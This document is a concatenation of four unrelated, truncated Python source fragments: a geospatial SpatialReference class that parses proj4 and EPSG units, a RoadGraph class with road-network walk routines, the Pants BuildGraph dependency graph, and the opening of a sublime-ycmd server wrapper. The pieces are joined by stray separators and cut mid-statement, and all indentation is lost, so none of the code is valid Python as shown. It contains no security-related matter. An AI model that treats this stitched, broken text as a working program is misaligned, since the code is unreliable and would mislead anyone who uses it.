elif self.origin_loc == "ul":
# calculate coords for lower left corner
yll = self._yul - (
np.cos(self.theta) * self.yedge[0] * self.length_multiplier
)
return yll
@property
def xul(self):
if self.origin_loc == "ll":
# calculate coords for upper left corner
xul = self._xll + (
np.sin(self.theta) * self.yedge[0] * self.length_multiplier
)
if self.origin_loc == "ul":
# calculate coords for lower left corner
xul = self._xul if self._xul is not None else 0.0
return xul
@property
def yul(self):
if self.origin_loc == "ll":
# calculate coords for upper left corner
yul = self._yll + (
np.cos(self.theta) * self.yedge[0] * self.length_multiplier
)
if self.origin_loc == "ul":
# calculate coords for lower left corner
yul = self._yul if self._yul is not None else 0.0
return yul
@property
def proj4_str(self):
proj4_str = None
if self._proj4_str is not None:
if "epsg" in self._proj4_str.lower():
if "init" not in self._proj4_str.lower():
proj4_str = "+init=" + self._proj4_str
else:
proj4_str = self._proj4_str
# set the epsg if proj4 specifies it
tmp = [i for i in self._proj4_str.split() if "epsg" in i.lower()]
self._epsg = int(tmp[0].split(":")[1])
else:
proj4_str = self._proj4_str
elif self.epsg is not None:
proj4_str = "+init=epsg:{}".format(self.epsg)
return proj4_str
@property
def epsg(self):
# don't reset the proj4 string here
# because proj4 attribute may already be populated
# (with more details than getprj would return)
# instead reset proj4 when epsg is set
# (on init or setattr)
return self._epsg
# @property
# def wkt(self):
# if self._wkt is None:
# if self.prj is not None:
# with open(self.prj) as src:
# wkt = src.read()
# elif self.epsg is not None:
# wkt = getprj(self.epsg)
# else:
# return None
# return wkt
# else:
# return self._wkt
@property
def lenuni(self):
return self._lenuni
def _parse_units_from_proj4(self):
units = None
try:
# need this because preserve_units doesn't seem to be
# working for complex proj4 strings. So if an
# epsg code was passed, we have no choice, but if a
# proj4 string was passed, we can just parse it
proj_str = self.proj4_str
# if "EPSG" in self.proj4_str.upper():
# import pyproj
#
# crs = pyproj.Proj(self.proj4_str,
# preserve_units=True,
# errcheck=True)
# proj_str = crs.srs
# else:
# proj_str = self.proj4_str
# http://proj4.org/parameters.html#units
# from proj4 source code
# "us-ft", "0.304800609601219", "U.S. Surveyor's Foot",
# "ft", "0.3048", "International Foot",
if "units=m" in proj_str:
units = "meters"
elif (
"units=ft" in proj_str
or "units=us-ft" in proj_str
or "to_meters:0.3048" in proj_str
):
units = "feet"
return units
except:
if self.proj4_str is not None:
print(" could not parse units from {}".format(self.proj4_str))
@property
def units(self):
if self._units is not None:
units = self._units.lower()
else:
units = self._parse_units_from_proj4()
if units is None:
# print("warning: assuming SpatialReference units are meters")
units = "meters"
assert units in self.supported_units
return units
@property
def length_multiplier(self):
"""
Attempt to identify multiplier for converting from
model units to sr units, defaulting to 1.
"""
lm = None
if self._length_multiplier is not None:
lm = self._length_multiplier
else:
if self.model_length_units == "feet":
if self.units == "meters":
lm = 0.3048
elif self.units == "feet":
lm = 1.0
elif self.model_length_units == "meters":
if self.units == "feet":
lm = 1 / 0.3048
elif self.units == "meters":
lm = 1.0
elif self.model_length_units == "centimeters":
if self.units == "meters":
lm = 1 / 100.0
elif self.units == "feet":
lm = 1 / 30.48
else: # model units unspecified; default to 1
lm = 1.0
return lm
@property
def model_length_units(self):
return self.lenuni_text[self.lenuni]
@property
def bounds(self):
"""
Return bounding box in shapely order.
"""
xmin, xmax, ymin, ymax = self.get_extent()
return xmin, ymin, xmax, ymax
@staticmethod
def load(namefile=None, reffile="usgs.model.reference"):
"""
Attempts to load spatial reference information from
the following files (in order):
1) usgs.model.reference
2) NAM file (header comment)
3) SpatialReference.default dictionary
"""
reffile = os.path.join(os.path.split(namefile)[0], reffile)
d = SpatialReference.read_usgs_model_reference_file(reffile)
if d is not None:
return d
d = SpatialReference.attribs_from_namfile_header(namefile)
if d is not None:
return d
else:
return SpatialReference.defaults
@staticmethod
def attribs_from_namfile_header(namefile):
# check for reference info in the nam file header
d = SpatialReference.defaults.copy()
d["source"] = "namfile"
if namefile is None:
return None
header = []
with open(namefile, "r") as f:
for line in f:
if not line.startswith("#"):
break
header.extend(
line.strip().replace("#", "").replace(",", ";").split(";")
)
for item in header:
if "xul" in item.lower():
try:
d["xul"] = float(item.split(":")[1])
except:
print(" could not parse xul " + "in {}".format(namefile))
elif "yul" in item.lower():
try:
d["yul"] = float(item.split(":")[1])
except:
print(" could not parse yul " + "in {}".format(namefile))
elif "rotation" in item.lower():
try:
d["rotation"] = float(item.split(":")[1])
except:
print(" could not parse rotation " + "in {}".format(namefile))
elif "proj4_str" in item.lower():
try:
proj4_str = ":".join(item.split(":")[1:]).strip()
if proj4_str.lower() == "none":
proj4_str = None
d["proj4_str"] = proj4_str
except:
print(" could not parse proj4_str " + "in {}".format(namefile))
elif "start" in item.lower():
try:
d["start_datetime"] = item.split(":")[1].strip()
except:
print(" could not parse start " + "in {}".format(namefile))
# spatial reference length units
elif "units" in item.lower():
d["units"] = item.split(":")[1].strip()
# model length units
elif "lenuni" in item.lower():
d["lenuni"] = int(item.split(":")[1].strip())
# multiplier for converting from model length units to sr length units
elif "length_multiplier" in item.lower():
d["length_multiplier"] = float(item.split(":")[1].strip())
return d
@staticmethod
def read_usgs_model_reference_file(reffile="usgs.model.reference"):
"""
read spatial reference info from the usgs.model.reference file
https://water.usgs.gov/ogw/policy/gw-model/modelers-setup.html
"""
ITMUNI = {
0: "undefined",
1: "seconds",
2: "minutes",
3: "hours",
4: "days",
5: "years",
}
itmuni_values = {v: k for k, v in ITMUNI.items()}
d = SpatialReference.defaults.copy()
d["source"] = "usgs.model.reference"
# discard default to avoid confusion with epsg code if entered
d.pop("proj4_str")
if os.path.exists(reffile):
with open(reffile) as fref:
for line in fref:
if len(line) > 1:
if line.strip()[0] != "#":
info = line.strip().split("#")[0].split()
if len(info) > 1:
d[info[0].lower()] = " ".join(info[1:])
d["xul"] = float(d["xul"])
d["yul"] = float(d["yul"])
d["rotation"] = float(d["rotation"])
# convert the model.reference text to a lenuni value
# (these are the model length units)
if "length_units" in d.keys():
d["lenuni"] = SpatialReference.lenuni_values[d["length_units"]]
if "time_units" in d.keys():
d["itmuni"] = itmuni_values[d["time_units"]]
if "start_date" in d.keys():
start_datetime = d.pop("start_date")
if "start_time" in d.keys():
start_datetime += " {}".format(d.pop("start_time"))
d["start_datetime"] = start_datetime
if "epsg" in d.keys():
try:
d["epsg"] = int(d["epsg"])
except Exception as e:
raise Exception("error reading epsg code from file:\n" + str(e))
# this prioritizes epsg over proj4 if both are given
# (otherwise 'proj4' entry will be dropped below)
elif "proj4" in d.keys():
d["proj4_str"] = d["proj4"]
# drop any other items that aren't used in sr class
d = {
k: v
for k, v in d.items()
if k.lower() in SpatialReference.defaults.keys()
or k.lower() in {"epsg", "start_datetime", "itmuni", "source"}
}
return d
else:
return None
def __setattr__(self, key, value):
reset = True
if key == "delr":
super(SpatialReference, | |
import numpy as np
import math
import sys
import pickle
def Coord2Pixels(lat, lon, min_lat, min_lon, max_lat, max_lon, sizex, sizey):
#print(max_lat, min_lat, sizex)
ilat = sizex - int((lat-min_lat) / ((max_lat - min_lat)/sizex))
#ilat = int((lat-min_lat) / ((max_lat - min_lat)/sizex))
ilon = int((lon-min_lon) / ((max_lon - min_lon)/sizey))
return ilat, ilon
def distance(p1, p2):
a = p1[0] - p2[0]
b = (p1[1] - p2[1])*math.cos(math.radians(p1[0]))
return np.sqrt(a*a + b*b)
class RoadGraph:
def __init__(self, filename=None, region = None):
self.nodeHash = {} # [tree_idx*10000000 + local_id] -> id
self.nodeHashReverse = {}
self.nodes = {} # id -> [lat,lon]
self.edges = {} # id -> [n1, n2]
self.nodeLink = {} # id -> list of next node
self.nodeID = 0
self.edgeID = 0
self.edgeHash = {} # [nid1 * 10000000 + nid2] -> edge id
self.edgeScore = {}
self.nodeTerminate = {}
self.nodeScore = {}
self.nodeLocations = {}
if filename is not None:
dumpDat = pickle.load(open(filename, "rb"))
forest = dumpDat[1]
self.forest = forest
tid = 0
for t in forest:
for n in t:
idthis = tid*10000000 + n['id']
thislat = n['lat']
thislon = n['lon']
if region is not None:
if thislat < region[0] or thislon < region[1] or thislat > region[2] or thislon > region[3]:
continue
#if n['edgeScore'] < 7.0 : # skip those low confidential edges
#
# continue
if n['similarWith'][0] != -1:
idthis = n['similarWith'][0]*10000000 + n['similarWith'][1]
thislat = forest[n['similarWith'][0]][n['similarWith'][1]]['lat']
thislon = forest[n['similarWith'][0]][n['similarWith'][1]]['lon']
if n['OutRegion'] == 1:
self.nodeTerminate[tid*10000000+n['parent']] = 1
idparent = tid*10000000 + n['parent']
parentlat = t[n['parent']]['lat']
parentlon = t[n['parent']]['lon']
if n['parent'] == 0:
print(tid, n['id'])
self.addEdge(idparent, parentlat, parentlon, idthis, thislat, thislon)
tid += 1
def addEdge(self, nid1,lat1,lon1,nid2,lat2,lon2, reverse=False, nodeScore1 = 0, nodeScore2 = 0, edgeScore = 0): #n1d1->n1d2
if nid1 not in self.nodeHash.keys():
self.nodeHash[nid1] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid1
self.nodes[self.nodeID] = [lat1, lon1]
self.nodeLink[self.nodeID] = []
#self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore1
self.nodeID += 1
if nid2 not in self.nodeHash.keys():
self.nodeHash[nid2] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid2
self.nodes[self.nodeID] = [lat2, lon2]
self.nodeLink[self.nodeID] = []
#self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore2
self.nodeID += 1
localid1 = self.nodeHash[nid1]
localid2 = self.nodeHash[nid2]
if localid1 * 10000000 + localid2 in self.edgeHash.keys():
print("Duplicated Edge !!!", nid1, nid2)
return
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = edgeScore
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
if reverse == True:
if localid2 not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[localid2] = []
if localid1 not in self.nodeLinkReverse[localid2]:
self.nodeLinkReverse[localid2].append(localid1)
def addEdgeToOneExistedNode(self, nid1,lat1,lon1,nid2, reverse=False, nodeScore1 = 0, edgeScore = 0): #n1d1->n1d2
if nid1 not in self.nodeHash.keys():
self.nodeHash[nid1] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid1
self.nodes[self.nodeID] = [lat1, lon1]
self.nodeLink[self.nodeID] = []
self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore1
self.nodeID += 1
localid1 = self.nodeHash[nid1]
localid2 = nid2
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = edgeScore
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
if localid1 not in self.nodeLinkReverse[localid2]:
self.nodeLinkReverse[localid2].append(localid1)
def BiDirection(self):
edgeList = list(self.edges.values())
for edge in edgeList:
localid1 = edge[1]
localid2 = edge[0]
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = self.edgeScore[self.edgeHash[localid2 * 10000000 + localid1]]
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
def ReverseDirectionLink(self):
edgeList = list(self.edges.values())
self.nodeLinkReverse = {}
for edge in edgeList:
localid1 = edge[1]
localid2 = edge[0]
if localid1 not in self.nodeLinkReverse :
self.nodeLinkReverse[localid1] = [localid2]
else:
if localid2 not in self.nodeLinkReverse[localid1]:
self.nodeLinkReverse[localid1].append(localid2)
for nodeId in self.nodes.keys():
if nodeId not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[nodeId] = []
# DFS
def TOPOWalkDFS(self, nodeid, step = 0.00005, r = 0.00300, direction = False):
localNodeList = {}
localNodeDistance = {}
mables = []
localEdges = {}
#localNodeList[nodeid] = 1
#localNodeDistance[nodeid] = 0
def explore(node_cur, node_prev, dist):
old_node_dist = 1
if node_cur in localNodeList.keys():
old_node_dist = localNodeDistance[node_cur]
if localNodeDistance[node_cur] <= dist:
return
if dist > r :
return
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
localNodeList[node_cur] = 1
localNodeDistance[node_cur] = dist
#mables.append((lat1, lon1))
if node_cur not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[node_cur] = []
reverseList = []
if direction == False:
reverseList = self.nodeLinkReverse[node_cur]
for next_node in self.nodeLink[node_cur] + reverseList:
edgeS = 0
if node_cur * 10000000 + next_node in self.edgeHash.keys():
edgeS = self.edgeScore[self.edgeHash[node_cur * 10000000 + next_node]]
if next_node * 10000000 + node_cur in self.edgeHash.keys():
edgeS = max(edgeS, self.edgeScore[self.edgeHash[next_node * 10000000 + node_cur]])
if self.nodeScore[next_node] > 0 and edgeS > 0:
pass
else:
continue
if next_node == node_prev :
continue
lat0 = 0
lon0 = 0
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
lat2 = self.nodes[next_node][0]
lon2 = self.nodes[next_node][1]
#TODO check angle of next_node
localEdgeId = node_cur * 10000000 + next_node
# if localEdgeId not in localEdges.keys():
# localEdges[localEdgeId] = 1
l = distance((lat2,lon2), (lat1,lon1))
num = int(math.ceil(l / step))
bias = step * math.ceil(dist / step) - dist
cur = bias
if old_node_dist + l < r :
explore(next_node, node_cur, dist + l)
else:
while cur < l:
alpha = cur / l
#for a in range(1,num):
# alpha = float(a)/num
if dist + l * alpha > r :
break
latI = lat2 * alpha + lat1 * (1-alpha)
lonI = lon2 * alpha + lon1 * (1-alpha)
if (latI, lonI) not in mables:
mables.append((latI, lonI))
cur += step
l = distance((lat2,lon2), (lat1,lon1))
explore(next_node, node_cur, dist + l)
explore(nodeid, -1, 0)
return mables
def distanceBetweenTwoLocation(self, loc1, loc2, max_distance):
localNodeList = {}
localNodeDistance = {}
#mables = []
localEdges = {}
edge_covered = {} # (s,e) --> distance from s and distance from e
if loc1[0] == loc2[0] and loc1[1] == loc2[1] :
return abs(loc1[2] - loc2[2])
elif loc1[0] == loc2[1] and loc1[1] == loc2[0]:
return abs(loc1[2] - loc2[3])
ans_dist = 100000
Queue = [(loc1[0], -1, loc1[2]), (loc1[1], -1, loc1[2])]
while True:
if len(Queue) == 0:
break
args = Queue.pop(0)
node_cur, node_prev, dist = args[0], args[1], args[2]
old_node_dist = 1
if node_cur in localNodeList.keys():
old_node_dist = localNodeDistance[node_cur]
if localNodeDistance[node_cur] <= dist:
continue
if dist > max_distance :
continue
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
localNodeList[node_cur] = 1
localNodeDistance[node_cur] = dist
#mables.append((lat1, lon1))
if node_cur not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[node_cur] = []
reverseList = []
reverseList = self.nodeLinkReverse[node_cur]
visited_next_node = []
for next_node in self.nodeLink[node_cur] + reverseList:
if next_node == node_prev:
continue
if next_node == node_cur :
continue
if next_node == loc1[0] or next_node == loc1[1] :
continue
if next_node in visited_next_node:
continue
visited_next_node.append(next_node)
edgeS = 0
lat0 = 0
lon0 = 0
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
lat2 = self.nodes[next_node][0]
lon2 = self.nodes[next_node][1]
localEdgeId = node_cur * 10000000 + next_node
# if localEdgeId not in localEdges.keys():
# localEdges[localEdgeId] = 1
if node_cur == loc2[0] and next_node == loc2[1]:
new_ans = dist + loc2[2]
if new_ans < ans_dist :
ans_dist = new_ans
elif node_cur == loc2[1] and next_node == loc2[0]:
new_ans = dist + loc2[3]
if new_ans < ans_dist :
ans_dist = new_ans
l = distance((lat2,lon2), (lat1,lon1))
Queue.append((next_node, node_cur, dist + l))
return ans_dist
# BFS (much faster)
def TOPOWalk(self, nodeid, step = 0.00005, r = 0.00300, direction = False, newstyle = False, nid1=0, nid2=0, dist1=0, dist2= 0, bidirection = False, CheckGPS = None, metaData = None):
localNodeList = {}
localNodeDistance = {}
mables = []
localEdges = {}
edge_covered = {} # (s,e) --> distance from s and distance from e
#localNodeList[nodeid] = 1
#localNodeDistance[nodeid] = 0
if newstyle == False:
Queue = [(nodeid, -1, 0)]
else:
Queue = [(nid1, -1, dist1), (nid2, -1, dist2)]
# Add holes between nid1 and nid2
lat1 = self.nodes[nid1][0]
lon1 = self.nodes[nid1][1]
lat2 = self.nodes[nid2][0]
lon2 = self.nodes[nid2][1]
l = distance((lat2,lon2), (lat1,lon1))
num = int(math.ceil(l / step))
alpha = 0
while True:
latI = lat1*alpha + lat2*(1-alpha)
lonI = lon1*alpha + lon2*(1-alpha)
d1 = distance((latI,lonI),(lat1,lon1))
d2 = distance((latI,lonI),(lat2,lon2))
if dist1 - d1 < r or dist2 -d2 < r:
if (latI, lonI, lat2 - lat1, lon2 - lon1) not in mables:
mables.append((latI, lonI, lat2 - lat1, lon2 - lon1)) # | |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import traceback
from collections import OrderedDict, defaultdict, deque
from twitter.common.collections import OrderedSet
from pants.build_graph.address import Address
from pants.build_graph.address_lookup_error import AddressLookupError
logger = logging.getLogger(__name__)
class BuildGraph(object):
"""A directed acyclic graph of Targets and dependencies. Not necessarily connected."""
class DuplicateAddressError(AddressLookupError):
"""The same address appears multiple times in a dependency list"""
class TransitiveLookupError(AddressLookupError):
"""Used to append the current node to the error message from an AddressLookupError """
@staticmethod
def closure(targets, bfs=False):
targets = OrderedSet(targets)
if not targets:
return OrderedSet()
build_graph = next(iter(targets))._build_graph
if bfs:
transitive_subgraph_fn = build_graph.transitive_subgraph_of_addresses_bfs
else:
transitive_subgraph_fn = build_graph.transitive_subgraph_of_addresses
return transitive_subgraph_fn(t.address for t in targets)
def __init__(self, address_mapper):
self._address_mapper = address_mapper
self.reset()
@property
def address_mapper(self):
return self._address_mapper
def reset(self):
"""Clear out the state of the BuildGraph, in particular Target mappings and dependencies."""
self._addresses_already_closed = set()
self._target_by_address = OrderedDict()
self._target_dependencies_by_address = defaultdict(OrderedSet)
self._target_dependees_by_address = defaultdict(set)
self._derived_from_by_derivative_address = {}
def contains_address(self, address):
return address in self._target_by_address
def get_target_from_spec(self, spec, relative_to=''):
"""Converts `spec` into an address and returns the result of `get_target`"""
return self.get_target(Address.parse(spec, relative_to=relative_to))
def get_target(self, address):
"""Returns the Target at `address` if it has been injected into the BuildGraph, otherwise None.
"""
return self._target_by_address.get(address, None)
def dependencies_of(self, address):
"""Returns the dependencies of the Target at `address`.
This method asserts that the address given is actually in the BuildGraph.
"""
assert address in self._target_by_address, (
'Cannot retrieve dependencies of {address} because it is not in the BuildGraph.'
.format(address=address)
)
return self._target_dependencies_by_address[address]
def dependents_of(self, address):
"""Returns the Targets which depend on the target at `address`.
This method asserts that the address given is actually in the BuildGraph.
"""
assert address in self._target_by_address, (
'Cannot retrieve dependents of {address} because it is not in the BuildGraph.'
.format(address=address)
)
return self._target_dependees_by_address[address]
def get_derived_from(self, address):
"""Get the target the specified target was derived from.
If a Target was injected programmatically, e.g. from codegen, this allows us to trace its
ancestry. If a Target is not derived, default to returning itself.
"""
parent_address = self._derived_from_by_derivative_address.get(address, address)
return self.get_target(parent_address)
def get_concrete_derived_from(self, address):
"""Get the concrete target the specified target was (directly or indirectly) derived from.
The returned target is guaranteed to not have been derived from any other target.
"""
current_address = address
next_address = self._derived_from_by_derivative_address.get(current_address, current_address)
while next_address != current_address:
current_address = next_address
next_address = self._derived_from_by_derivative_address.get(current_address, current_address)
return self.get_target(current_address)
def inject_target(self, target, dependencies=None, derived_from=None):
"""Injects a fully realized Target into the BuildGraph.
:param Target target: The Target to inject.
:param list<Address> dependencies: The Target addresses that `target` depends on.
:param Target derived_from: The Target that `target` was derived from, usually as a result
of codegen.
"""
dependencies = dependencies or frozenset()
address = target.address
if address in self._target_by_address:
raise ValueError('A Target {existing_target} already exists in the BuildGraph at address'
' {address}. Failed to insert {target}.'
.format(existing_target=self._target_by_address[address],
address=address,
target=target))
if derived_from:
if not self.contains_address(derived_from.address):
raise ValueError('Attempted to inject synthetic {target} derived from {derived_from}'
' into the BuildGraph, but {derived_from} was not in the BuildGraph.'
' Synthetic Targets must be derived from no Target (None) or from a'
' Target already in the BuildGraph.'
.format(target=target,
derived_from=derived_from))
self._derived_from_by_derivative_address[target.address] = derived_from.address
self._target_by_address[address] = target
for dependency_address in dependencies:
self.inject_dependency(dependent=address, dependency=dependency_address)
def inject_dependency(self, dependent, dependency):
"""Injects a dependency from `dependent` onto `dependency`.
It is an error to inject a dependency if the dependent doesn't already exist, but the reverse
is not an error.
:param Address dependent: The (already injected) address of a Target to which `dependency`
is being added.
:param Address dependency: The dependency to be injected.
"""
if dependent not in self._target_by_address:
raise ValueError('Cannot inject dependency from {dependent} on {dependency} because the'
' dependent is not in the BuildGraph.'
.format(dependent=dependent, dependency=dependency))
# TODO(pl): Unfortunately this is an unhelpful time to error due to a cycle. Instead, we warn
# and allow the cycle to appear. It is the caller's responsibility to call sort_targets on the
# entire graph to generate a friendlier CycleException that actually prints the cycle.
# Alternatively, we could call sort_targets after every inject_dependency/inject_target, but
# that could have nasty performance implications. Alternative 2 would be to have an internal
# data structure of the topologically sorted graph which would have acceptable amortized
# performance for inserting new nodes, and also cycle detection on each insert.
if dependency not in self._target_by_address:
logger.warning('Injecting dependency from {dependent} on {dependency}, but the dependency'
' is not in the BuildGraph. This probably indicates a dependency cycle, but'
' it is not an error until sort_targets is called on a subgraph containing'
' the cycle.'
.format(dependent=dependent, dependency=dependency))
if dependency in self.dependencies_of(dependent):
logger.debug('{dependent} already depends on {dependency}'
.format(dependent=dependent, dependency=dependency))
else:
self._target_dependencies_by_address[dependent].add(dependency)
self._target_dependees_by_address[dependency].add(dependent)
def targets(self, predicate=None):
"""Returns all the targets in the graph in no particular order.
:param predicate: A target predicate that will be used to filter the targets returned.
"""
return filter(predicate, self._target_by_address.values())
def sorted_targets(self):
""":return: targets ordered from most dependent to least."""
return sort_targets(self._target_by_address.values())
def walk_transitive_dependency_graph(self, addresses, work, predicate=None, postorder=False):
"""Given a work function, walks the transitive dependency closure of `addresses` using DFS.
:param list<Address> addresses: The closure of `addresses` will be walked.
:param function work: The function that will be called on every target in the closure using
the specified traversal order.
:param bool postorder: When ``True``, the traversal order is postorder (children before
parents), else it is preorder (parents before children).
:param function predicate: If this parameter is not given, no Targets will be filtered
out of the closure. If it is given, any Target which fails the predicate will not be
walked, nor will its dependencies. Thus predicate effectively trims out any subgraph
that would only be reachable through Targets that fail the predicate.
"""
walked = set()
def _walk_rec(addr):
if addr not in walked:
walked.add(addr)
target = self._target_by_address[addr]
if not predicate or predicate(target):
if not postorder:
work(target)
for dep_address in self._target_dependencies_by_address[addr]:
_walk_rec(dep_address)
if postorder:
work(target)
for address in addresses:
_walk_rec(address)
def walk_transitive_dependee_graph(self, addresses, work, predicate=None, postorder=False):
"""Identical to `walk_transitive_dependency_graph`, but walks dependees preorder (or postorder
if the postorder parameter is True).
This is identical to reversing the direction of every arrow in the DAG, then calling
`walk_transitive_dependency_graph`.
"""
walked = set()
def _walk_rec(addr):
if addr not in walked:
walked.add(addr)
target = self._target_by_address[addr]
if not predicate or predicate(target):
if not postorder:
work(target)
for dep_address in self._target_dependees_by_address[addr]:
_walk_rec(dep_address)
if postorder:
work(target)
for address in addresses:
_walk_rec(address)
def transitive_dependees_of_addresses(self, addresses, predicate=None, postorder=False):
"""Returns all transitive dependees of `address`.
Note that this uses `walk_transitive_dependee_graph` and the predicate is passed through,
hence it trims graphs rather than just filtering out Targets that do not match the predicate.
See `walk_transitive_dependee_graph for more detail on `predicate`.
:param list<Address> addresses: The root addresses to transitively close over.
:param function predicate: The predicate passed through to `walk_transitive_dependee_graph`.
"""
ret = OrderedSet()
self.walk_transitive_dependee_graph(addresses, ret.add, predicate=predicate,
postorder=postorder)
return ret
def transitive_subgraph_of_addresses(self, addresses, predicate=None, postorder=False):
"""Returns all transitive dependencies of `address`.
Note that this uses `walk_transitive_dependencies_graph` and the predicate is passed through,
hence it trims graphs rather than just filtering out Targets that do not match the predicate.
See `walk_transitive_dependencies_graph for more detail on `predicate`.
:param list<Address> addresses: The root addresses to transitively close over.
:param function predicate: The predicate passed through to
`walk_transitive_dependencies_graph`.
"""
ret = OrderedSet()
self.walk_transitive_dependency_graph(addresses, ret.add,
predicate=predicate,
postorder=postorder)
return ret
def transitive_subgraph_of_addresses_bfs(self, addresses, predicate=None):
"""Returns the transitive dependency closure of `addresses` using BFS.
:param list<Address> addresses: The closure of `addresses` will be walked.
:param function predicate: If this parameter is not given, no Targets will be filtered
out of the closure. If it is given, any Target which fails the predicate will not be
walked, nor will its dependencies. Thus predicate effectively trims out any subgraph
that would only be reachable through Targets that fail the predicate.
"""
walked = OrderedSet()
to_walk = deque(addresses)
while len(to_walk) | |
#!/usr/bin/env python3
'''
lib/ycmd/server.py
Server abstraction layer.
Defines a server class that represents a connection to a ycmd server process.
Information about the actual server process is available via the properties.
The ycmd server handlers are exposed as methods on this class. To send a
request to the server process, call the method, and it will package up the
parameters and send the request. These calls will block, and return the result
of the request (or raise an exception for unexpected errors).
NOTE : This uses `http` instead of `urllib`, as `urllib` raises exceptions when
the server responds with an error status code. This prevents fetching
the response body to parse/retrieve the error message.
'''
import http
import logging
import os
import threading
from ..process import Process
from ..schema.completions import parse_completions
from ..schema.request import RequestParameters
from ..util.format import (
json_serialize,
json_parse,
)
from ..util.fs import (
is_file,
get_base_name,
)
from ..util.hmac import (
calculate_hmac,
new_hmac_secret,
)
from ..util.lock import lock_guard
from ..util.str import (
str_to_bytes,
truncate,
)
from ..util.sys import get_unused_port
from ..ycmd.constants import (
YCMD_EVENT_BUFFER_UNLOAD,
YCMD_EVENT_BUFFER_VISIT,
YCMD_EVENT_CURRENT_IDENTIFIER_FINISHED,
YCMD_EVENT_FILE_READY_TO_PARSE,
YCMD_EVENT_INSERT_LEAVE,
YCMD_HANDLER_DEBUG_INFO,
YCMD_HANDLER_DEFINED_SUBCOMMANDS,
YCMD_HANDLER_EVENT_NOTIFICATION,
YCMD_HANDLER_GET_COMPLETIONS,
YCMD_HANDLER_HEALTHY,
YCMD_HANDLER_IGNORE_EXTRA_CONF,
YCMD_HANDLER_LOAD_EXTRA_CONF,
YCMD_HANDLER_SHUTDOWN,
YCMD_HMAC_HEADER,
YCMD_HMAC_SECRET_LENGTH,
)
from ..ycmd.start import (
StartupParameters,
to_startup_parameters,
write_ycmd_settings_file,
prepare_ycmd_process,
)
logger = logging.getLogger('sublime-ycmd.' + __name__)
# special logger instance for use in the server class
# this logger uses a filter to add server information to all log statements
_server_logger = logging.getLogger('sublime-ycmd.' + __name__ + '.server')
# time limit for queued requests, in seconds
# it's a good idea to have one, so requests can't be queued indefinitely
QUEUED_REQUEST_MAX_WAIT_TIME = 1
class Server(object):
'''
Self-contained ycmd server object. Creates and maintains a persistent
connection to a ycmd server process. Provides a simple-ish way to send
API requests to the backend, including control functions like stopping and
pinging the server.
'''
NULL = 'Server.NULL'
STARTING = 'Server.STARTING'
RUNNING = 'Server.RUNNING'
STOPPING = 'Server.STOPPING'
def __init__(self):
self._lock = threading.RLock()
self._status = Server.NULL
self._status_cv = threading.Condition(self._lock)
self._process_handle = None
# handles to the spooled log files:
self._stdout_log_handle = None
self._stderr_log_handle = None
# copy of the startup parameters and temporary file path:
self._startup_parameters = None
self._settings_tempfile_path = None
self._hostname = None
self._port = None
self._hmac = None
self._label = None
self.reset()
def reset(self):
self._status = Server.NULL
self._process_handle = None
self._stdout_log_handle = None
self._stderr_log_handle = None
self._startup_parameters = None
self._settings_tempfile_path = None
self._hostname = None
self._port = None
self._hmac = None
self._label = None
self._reset_logger()
def start(self, ycmd_root_directory,
ycmd_settings_path=None, working_directory=None,
python_binary_path=None, server_idle_suicide_seconds=None,
server_check_interval_seconds=None):
'''
Launches a ycmd server process with the given startup parameters. The
only required startup parameter is `ycmd_root_directory`. If it is a
`str`, then all other omitted parameters will be calculated with
respect to it. If it is an instance of `StartupParameters`, then all
other parameters will be ignored, as that class contains all the
necessary information. It is preferable to use `StartupParameters`.
If `ycmd_settings_path` is not provided, it is calculated relative to
the `ycmd_root_directory` (the repository contains the template in
`default_settings.json`).
If `working_directory` is not provided, the current working directory
is used, as calculated by the `os` module.
If `python_binary_path` is not provided, the system-installed python is
used. This implicitly depends on the `PATH` environment variable.
If `server_idle_suicide_seconds` is not provided, a default is used.
If `server_check_interval_seconds` is not provided, a default is used.
It is preferable to use the concrete `StartupParameters` class, since
this ends up constructing one anyway if it isn't already in that form.
'''
startup_parameters = to_startup_parameters(
ycmd_root_directory,
ycmd_settings_path=ycmd_settings_path,
working_directory=working_directory,
python_binary_path=python_binary_path,
server_idle_suicide_seconds=server_idle_suicide_seconds,
server_check_interval_seconds=server_check_interval_seconds,
)
assert isinstance(startup_parameters, StartupParameters), \
'[internal] startup parameters is not StartupParameters: %r' % \
(startup_parameters)
# don't use instance logger, since it may not be initialized
logger.debug(
'preparing to start ycmd server with startup parameters: %s',
startup_parameters,
)
self.set_status(Server.STARTING)
# update parameters to reflect normalized settings:
ycmd_root_directory = startup_parameters.ycmd_root_directory
ycmd_settings_path = startup_parameters.ycmd_settings_path
working_directory = startup_parameters.working_directory
python_binary_path = startup_parameters.python_binary_path
server_idle_suicide_seconds = \
startup_parameters.server_idle_suicide_seconds
server_check_interval_seconds = \
startup_parameters.server_check_interval_seconds
